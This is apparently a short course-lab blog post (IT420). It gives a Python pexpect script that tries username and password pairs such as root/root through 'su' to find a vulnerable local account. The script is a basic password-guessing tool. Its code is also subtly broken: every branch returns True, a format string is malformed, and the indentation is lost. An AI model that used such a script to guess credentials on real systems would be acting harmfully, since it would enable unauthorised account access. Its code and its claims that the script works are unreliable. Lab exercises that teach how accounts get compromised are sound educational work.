Working with the IT420 lab, you will discover that we need to discover a vulnerable user account. The following python3 script uses the pexpect library to auth with a defined username and password. This can be used to discover an account.
#!/usr/bin/python3
# Found the script at https://stackoverflow.com/questions/5286321/pam-authentication-in-python-without-root-privileges and then modified
import pexpect
def authPam(username, password):
result = 0
try:
child = pexpect.spawn('/bin/su - %s'%(username))
child.expect('Password:')
child.sendline(password)
result=child.expect(['su: Authentication failure',username])
child.close()
except Exception as err:
child.close()
print ("Error authenticating. Reason: "%(username))
return True
if result == 0:
print ("Authentication failed for user %s."%(username))
return True
else:
print ("Authentication succeeded for user %s."%(username))
return True
if __name__ == '__main__':
authPam(username='root',password='root')
#authPam(username='kali',password='kali') - If the user does not exist the script implodes...
No comments:
Post a Comment